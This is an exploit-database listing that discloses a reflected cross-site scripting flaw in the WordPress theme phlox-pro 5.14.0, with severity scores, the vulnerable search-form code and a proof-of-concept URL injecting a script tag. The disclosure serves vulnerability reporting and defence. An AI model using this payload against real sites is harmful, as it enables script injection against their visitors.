Advertisement






WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting (XSS)

CVE Category Price Severity
CWE-79 $500 Medium
Author Risk Exploitation Type Date
Unknown High Remote 2023-12-04
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 0.039 0.733

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120007

Below is a copy:

WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting (XSS)
# Exploit Title: WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting (XSS)
# Date: 3/12/2023   
# Exploit Author: Haktrak Team
# Vendor Homepage: https://phlox.pro
# Software Link: https://www.phlox.pro/go/
# Version: 5.14.0
# Tested on: Linux[apache]/wordrepss 6.3.1


Description:

A Cross Site Scripting (XSS) vulnerability exists in WordPress Theme phlox-pro

Vulnerable Code:


<form method="get" id="searchform" class="searchform" action="<?php echo esc_url( home_url( '/' ) ); ?>">

    <input type="text" class="field" name="s" id="s" placeholder="<?php esc_attr_e( 'Search Here', 'phlox-pro'); ?>" value="<?php the_search_query(); ?>" />





Steps to exploit:
1) Go to searchform
2) Insert your payload in the "search"

Proof of concept (Poc):
The following payload will allow you to run the javascript -
https://example.com/?s=ok&%27><script>alert(%27XSS%27)</script>123=1

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.